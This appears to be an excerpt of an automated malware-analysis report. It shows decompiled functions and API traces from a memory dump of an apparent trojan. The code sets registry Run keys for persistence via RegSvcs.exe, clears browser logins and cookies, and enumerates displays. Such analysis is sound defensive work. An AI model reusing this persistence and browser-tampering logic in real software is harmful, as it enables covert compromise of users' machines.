                                            0x013c20d4
                                            0x013c20dd
                                            0x013c20e6
                                            0x013c20e6
                                            0x013c20ef
                                            0x013c20f8
                                            0x013c20ff

                                            APIs
                                            • GetLocalTime.KERNEL32(?), ref: 013C2052
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,013C6BFC,?,013C5770,?,?,013B51EF,?), ref: 013C2087
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,013B51EF,?), ref: 013C2094
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,013B51EF,?), ref: 013C20A1
                                            • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,013B51EF,?), ref: 013C20AE
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,013B51EF,?), ref: 013C20B8
                                            • printf.MSVCRT ref: 013C20BF
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20CB
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20D4
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20DD
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20E6
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20EF
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B51EF), ref: 013C20F8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@$D@2@@0@Hstd@@V?$basic_string@$V10@$?c_str@?$basic_string@LocalTimeV10@0@V10@@printf
                                            • String ID: %02i:%02i:%02i:%03i
                                            • API String ID: 4249031962-3375869557
                                            • Opcode ID: ad4330bb66187f8adbc3aed8ab143f487e07cc596f18dad7f4aa981394eb091f
                                            • Instruction ID: ddaf018798deee93cc3e6a9c24005e5826804bf73670c40949b23a06310c890e
                                            • Opcode Fuzzy Hash: ad4330bb66187f8adbc3aed8ab143f487e07cc596f18dad7f4aa981394eb091f
                                            • Instruction Fuzzy Hash: 7F11BFB2900119AFCF11EBE5EC59EEE7B7CAB14B06F040019F542D2155EB74BA49CB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C3C3F, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 71windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 64%
                                            			E013C3C3F(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				struct tagPOINT _v12;
				void* _t16;
				struct HMENU__* _t17;
				void* _t20;
				void* _t24;

				_t16 = _a8 - 1;
				if(_t16 == 0) {
					_t17 = CreatePopupMenu();
					 *0x13cc1f0 = _t17;
					AppendMenuA(_t17, 0, 0, "Close");
					L15:
					return 0;
				}
				_t20 = _t16 - 0x110;
				if(_t20 == 0) {
					if(_a12 != 0) {
						goto L15;
					}
					Shell_NotifyIconA(2, 0x13cc200);
					ExitProcess(0);
				}
				if(_t20 == 0x2f0) {
					_t24 = _a16 - 0x201;
					if(_t24 == 0) {
						if(IsWindowVisible( *0x13cc1fc) == 0) {
							ShowWindow( *0x13cc1fc, 9);
							SetForegroundWindow( *0x13cc1fc);
						} else {
							ShowWindow( *0x13cc1fc, 0);
						}
						goto L15;
					}
					if(_t24 == 3) {
						GetCursorPos( &_v12);
						SetForegroundWindow(_a4);
						TrackPopupMenu( *0x13cc1f0, 0, _v12, _v12.y, 0, _a4, 0);
						goto L15;
					}
					_push(_a16);
					_push(_a12);
					_push(0x401);
					L4:
					return DefWindowProcA(_a4, ??, ??, ??);
				}
				_push(_a16);
				_push(_a12);
				_push(_a8);
				goto L4;
			}








                                            0x013c3c47
                                            0x013c3c48
                                            0x013c3d1c
                                            0x013c3d2c
                                            0x013c3d31
                                            0x013c3d37
                                            0x00000000
                                            0x013c3d37
                                            0x013c3c4e
                                            0x013c3c53
                                            0x013c3d03
                                            0x00000000
                                            0x00000000
                                            0x013c3d0c
                                            0x013c3d14
                                            0x013c3d14
                                            0x013c3c5e
                                            0x013c3c7a
                                            0x013c3c7f
                                            0x013c3cd1
                                            0x013c3ceb
                                            0x013c3cf7
                                            0x013c3cd3
                                            0x013c3cdb
                                            0x013c3cdb
                                            0x00000000
                                            0x013c3cd1
                                            0x013c3c84
                                            0x013c3c97
                                            0x013c3ca0
                                            0x013c3cbb
                                            0x00000000
                                            0x013c3cbb
                                            0x013c3c86
                                            0x013c3c89
                                            0x013c3c8c
                                            0x013c3c69
                                            0x00000000
                                            0x013c3c6c
                                            0x013c3c60
                                            0x013c3c63
                                            0x013c3c66
                                            0x00000000

                                            APIs
                                            • DefWindowProcA.USER32(?,00000401,?,?), ref: 013C3C6C
                                            • GetCursorPos.USER32(?), ref: 013C3C97
                                            • SetForegroundWindow.USER32(?), ref: 013C3CA0
                                            • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 013C3CBB
                                            • Shell_NotifyIconA.SHELL32(00000002,013CC200), ref: 013C3D0C
                                            • ExitProcess.KERNEL32 ref: 013C3D14
                                            • CreatePopupMenu.USER32 ref: 013C3D1C
                                            • AppendMenuA.USER32 ref: 013C3D31
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                            • String ID: Close
                                            • API String ID: 1657328048-3535843008
                                            • Opcode ID: af9fde1970ef390c543152f2e56b8f8d7ea0a330e45e1d73cc831727cc5c2b5a
                                            • Instruction ID: 39f656ef77449c882080965d8f9d5f70ee202ecd997f099314166ffe0db71e60
                                            • Opcode Fuzzy Hash: af9fde1970ef390c543152f2e56b8f8d7ea0a330e45e1d73cc831727cc5c2b5a
                                            • Instruction Fuzzy Hash: 5221C631244209EFEF215FA5ED0DBA97E3DBB04B4AF108418F619B50A9C7B1B9209B11
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B7D53, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 82COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 68%
                                            			E013B7D53(void* __ecx, char _a4, char _a8, char _a12, intOrPtr _a16) {
				char _v20;
				void* _t13;
				void* _t15;
				char* _t26;
				void* _t27;
				void* _t32;
				void* _t35;

				_t26 = "\"";
				if(_a4 == 1) {
					_t35 = _t27 - 0x10;
					L013C416A();
					L013C4146();
					_t13 = E013BB7B9(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _a16, _t35,  &_v20,  &_v20, _t26, 0x13cba28);
					_t27 = _t35 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a8 == 1) {
					_t32 = _t27 - 0x10;
					L013C416A();
					L013C4146();
					_t13 = E013BB7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _a16, _t32,  &_v20,  &_v20, _t26, 0x13cba28);
					_t27 = _t32 + 0x38;
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
				}
				if(_a12 == 1) {
					L013C416A();
					L013C4146();
					_t15 = E013BB7B9(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _a16, _t27 - 0x10,  &_v20,  &_v20, _t26, 0x13cba28);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ(_t26, 1);
					return _t15;
				}
				return _t13;
			}










                                            0x013b7d60
                                            0x013b7d6a
                                            0x013b7d71
                                            0x013b7d7a
                                            0x013b7d84
                                            0x013b7d99
                                            0x013b7d9e
                                            0x013b7da4
                                            0x013b7da4
                                            0x013b7dae
                                            0x013b7db5
                                            0x013b7dbe
                                            0x013b7dc8
                                            0x013b7ddd
                                            0x013b7de2
                                            0x013b7de8
                                            0x013b7de8
                                            0x013b7df2
                                            0x013b7e02
                                            0x013b7e0c
                                            0x013b7e21
                                            0x013b7e2c
                                            0x00000000
                                            0x013b7e2c
                                            0x013b7e36

                                            APIs
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,013C5628,013CBA28,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28,013C5A24,?,013B8003), ref: 013B7D7A
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe), ref: 013B7DA4
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28,013C5A24,?,013B8003), ref: 013B7D84
                                              • Part of subcall function 013BB7B9: RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 013BB7C6
                                              • Part of subcall function 013BB7B9: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(013C5628,?,?,013B7E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,013C5A24,?,?,?,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28), ref: 013BB7D5
                                              • Part of subcall function 013BB7B9: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,013B7E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,013C5A24,?,?,?,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28), ref: 013BB7E3
                                              • Part of subcall function 013BB7B9: RegSetValueExW.ADVAPI32(80000002,013B7E26,00000000,?,00000000,?,?,013B7E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,013C5A24), ref: 013BB7F6
                                              • Part of subcall function 013BB7B9: RegCloseKey.ADVAPI32(80000002,?,?,013B7E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,013C5A24,?,?,?,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28), ref: 013BB801
                                              • Part of subcall function 013BB7B9: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,013B7E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,013C5A24,?,?,?,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28,013C5A24), ref: 013BB810
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,013C5628,013CBA28,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28,013C5A24), ref: 013B7DBE
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28,013C5A24), ref: 013B7DC8
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe), ref: 013B7DE8
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(00000001,013C5628,013CBA28,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28,013C5A24), ref: 013B7E02
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe,013CBA28,013C5A24), ref: 013B7E0C
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,013C5628,00000001,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe), ref: 013B7E2C
                                            Strings
                                            • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 013B7E17
                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, xrefs: 013B7D5F
                                            • Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 013B7D8F, 013B7DD3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: G@std@@U?$char_traits@V?$allocator@$G@2@@0@G@2@@std@@Hstd@@V?$basic_string@$??1?$basic_string@$V10@V10@@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\
                                            • API String ID: 111787555-2257520152
                                            • Opcode ID: 2cd4093b135274323426e1c087f601b9d096c0dae8fdfb56b90cd5b4147ab8ec
                                            • Instruction ID: b964f46a2e5b3fc6c5e9b5dd28f2fe015af6a846e64fffe7daed831deeb7727f
                                            • Opcode Fuzzy Hash: 2cd4093b135274323426e1c087f601b9d096c0dae8fdfb56b90cd5b4147ab8ec
                                            • Instruction Fuzzy Hash: 9221F962E001157FDB20BAA99C8AEFF7F2CDFA1758F44041CF91561142F6A65D1487E2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013BBD9B, Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 62COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,013BBE54,?,?,00000004), ref: 013BBDAE
                                            • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKCU,?,?,00000004), ref: 013BBDC6
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BBE1E
                                            • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013BBE2B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@??8std@@D@2@@0@D@2@@std@@V?$basic_string@
                                            • String ID: HKCC$HKCR$HKCU$HKLM$HKU
                                            • API String ID: 2054586871-62392802
                                            • Opcode ID: 645b978561036920491660c2fed6736c1d1b5d1d910f5b39bbe0549fbf9bd90e
                                            • Instruction ID: 7997234a85047608d38087451a21b9c6e1e3d0f5721746fffb253e0455594809
                                            • Opcode Fuzzy Hash: 645b978561036920491660c2fed6736c1d1b5d1d910f5b39bbe0549fbf9bd90e
                                            • Instruction Fuzzy Hash: D401A96A64031E56CE148AD4E8416DDAF0C8F05ABAF50007FEF0497E44DF34994447C1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C21E8, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 51COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 013BB5A2: RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,80000000), ref: 013BB5C3
                                              • Part of subcall function 013BB5A2: RegQueryValueExW.ADVAPI32(80000000,013C2203,00000000,00000000,?,00000400), ref: 013BB5E2
                                              • Part of subcall function 013BB5A2: RegCloseKey.ADVAPI32(80000000), ref: 013BB5EB
                                              • Part of subcall function 013BB5A2: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(013C5800,?), ref: 013BB60A
                                            • ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(.exe,00000000,?,?,?,?,?,?,?,?,?,013B9BE6,?,00000000), ref: 013C2210
                                            • ?substr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000004,?,?,?,?,?,?,?,?,?,013B9BE6,?,00000000), ref: 013C2223
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,013B9BE6,?,00000000), ref: 013C222D
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,013B9BE6,?,00000000), ref: 013C2236
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,013B9BE6,?), ref: 013C224F
                                              • Part of subcall function 013C290A: ?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIPBGI@Z.MSVCP60(?,00000000,6F54CB60,?,?,013C225E,?), ref: 013C2919
                                              • Part of subcall function 013C290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,?,?,?,013C225E,?), ref: 013C2937
                                              • Part of subcall function 013C290A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,013C225E,?), ref: 013C293F
                                              • Part of subcall function 013C290A: ?replace@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@IIPBG@Z.MSVCP60(00000000,00000000,?,?,013C225E,?), ref: 013C294A
                                              • Part of subcall function 013C290A: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000,?,?,013C225E,?), ref: 013C2954
                                              • Part of subcall function 013C290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,013C225E,?), ref: 013C295D
                                              • Part of subcall function 013C290A: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,013C225E,?), ref: 013C2975
                                            • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013C2265
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C226E
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013C227B
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C2284
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$G@2@@std@@G@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@V01@@$??4?$basic_string@?find@?$basic_string@G@1@@V01@V12@$?length@?$basic_string@?replace@?$basic_string@?substr@?$basic_string@CloseOpenQueryValue
                                            • String ID: .exe$http\shell\open\command
                                            • API String ID: 2647146128-4091164470
                                            • Opcode ID: ee9ea3de9d7e06110f60e1c50a8bc5c0b487e4deea8af483f0e573055a64646d
                                            • Instruction ID: 1f270cd50aaa6467314c0d7485cdd81073092fad54e1cfec77a3b3f7f0808db8
                                            • Opcode Fuzzy Hash: ee9ea3de9d7e06110f60e1c50a8bc5c0b487e4deea8af483f0e573055a64646d
                                            • Instruction Fuzzy Hash: 76119D71A0021AAFDF14EFA4DC59FEE777CFB18709F840519F512A2295EA74B508CB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013C000F, Relevance: 18.1, APIs: 12, Instructions: 81COMMON
                                            Download Yara Rule
                                            APIs
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 013C0020
                                            • EnumDisplayMonitors.USER32(00000000,00000000,013C010A,00000000), ref: 013C003D
                                            • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 013C004D
                                            • EnumDisplayDevicesW.USER32(?,00000000,?,00000000), ref: 013C0078
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,013C623C), ref: 013C0095
                                            • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 013C00A0
                                            • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013C00AC
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C00B5
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C00BE
                                            • EnumDisplayDevicesW.USER32(00000000,00000000,00000148,00000000), ref: 013C00DF
                                            • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 013C00F5
                                            • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 013C00FE
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.611727246.00000000013B0000.00000040.00000001.sdmp, Offset: 013B0000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$DisplayEnum$??0?$basic_string@??1?$basic_string@Devices$G@1@@V01@@$G@2@@0@Hstd@@MonitorsV01@V10@V?$basic_string@Y?$basic_string@
                                            • String ID:
                                            • API String ID: 2807017801-0
                                            • Opcode ID: f0d5bdb78d067dc00e6f4bf7b70b43b659442da922b44823096f4600897cd44c
                                            • Instruction ID: 65cdc09aea6da2db13b697bd30e418b95810b3d744bd0667adc9f3f2df6aa9c5
                                            • Opcode Fuzzy Hash: f0d5bdb78d067dc00e6f4bf7b70b43b659442da922b44823096f4600897cd44c
                                            • Instruction Fuzzy Hash: 7A211A7190112EAFDB219F95DC88DEFBB7CEF04345F004059F50AE2054DB74AA89CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 013B78BB, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 100sleepCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 57%
                                            			E013B78BB(void* __ecx) {
				signed int _v5;
				signed int _v6;
				signed int _v7;
				signed int _v8;
				void* _t40;
				void* _t44;

				_push(__ecx);
				 *0x13cb9b8 = 1;
				Sleep( *0x13cb9b4);
				_v5 = _v5 & 0x00000000;
				_v6 = _v6 & 0x00000000;
				_v7 = _v7 & 0x00000000;
				_v8 = _v8 & 0x00000000;
				_t44 = 0;
				do {
					if(_v5 == 0) {
						L2:
						_v5 = E013B7767();
					}
					if(_v6 == 0) {
						_v6 = E013B751B();
					}
					if(_v8 == 0) {
						_v8 = E013B728F();
					}
					if(_v7 == 0) {
						_v7 = E013B71CF();
					}
					if(_t44 == 0) {
						_t44 = E013B710F();
					}
					if(_v5 == 0 || _v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0) {
						Sleep(0x1388);
					}
					if(_v5 == 0) {
						goto L2;
					}
				} while (_v6 == 0 || _v7 == 0 || _t44 == 0 || _v8 == 0);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E013B7A90("\n[Cleared browsers logins and cookies.]\n");
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z();
				E013C203B("[INFO]",  &_v7, "Cleared browsers logins and cookies.",  &_v8,  &_v8);
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v8);
				_t40 = E013B20C2(0x13cbe70, 0xaf, 0x13c5664);
				if( *0x13cb9b0 != 0) {
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					E013BB829(0x80000001, _t40, "FR", 1);
				}
				 *0x13cb9b8 =  *0x13cb9b8 & 0x00000000;
				return 0;
			}









                                            0x013b78be
                                            0x013b78cd
                                            0x013b78d4
                                            0x013b78d6
                                            0x013b78da
                                            0x013b78de
                                            0x013b78e2
                                            0x013b78e6
                                            0x013b78e8
                                            0x013b78ec
                                            0x013b78ee
                                            0x013b78f3
                                            0x013b78f3
                                            0x013b78fa
                                            0x013b7901
                                            0x013b7901
                                            0x013b7908
                                            0x013b790f
                                            0x013b790f
                                            0x013b7916
                                            0x013b791d
                                            0x013b791d
                                            0x013b7922
                                            0x013b7929
                                            0x013b7929
                                            0x013b792f
                                            0x013b794c
                                            0x013b794c
                                            0x013b7952
                                            0x00000000
                                            0x00000000
                                            0x013b7954
                                            0x013b797c
                                            0x013b7982
                                            0x013b7992
                                            0x013b79a6
                                            0x013b79ac
                                            0x013b79bf
                                            0x013b79cf
                                            0x013b79db
                                            0x013b79e9
                                            0x013b79f5
                                            0x013b79fa
                                            0x013b79fd
                                            0x013b7a09

                                            APIs
                                            • Sleep.KERNEL32 ref: 013B78D4
                                            • Sleep.KERNEL32(00001388), ref: 013B794C
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Cleared browsers logins and cookies.],?), ref: 013B797C
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(Cleared browsers logins and cookies.,?), ref: 013B7992
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?), ref: 013B79A6
                                            • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(013C5664,?), ref: 013B79BF
                                            • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(013C601C,00000001,000000AF), ref: 013B79E9
                                              • Part of subcall function 013B7767: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(00000000,74786490,00000000), ref: 013B7779
                                              • Part of subcall function 013B7767: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 013B77A1
                                              • Part of subcall function 013B7767: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 013B77AA
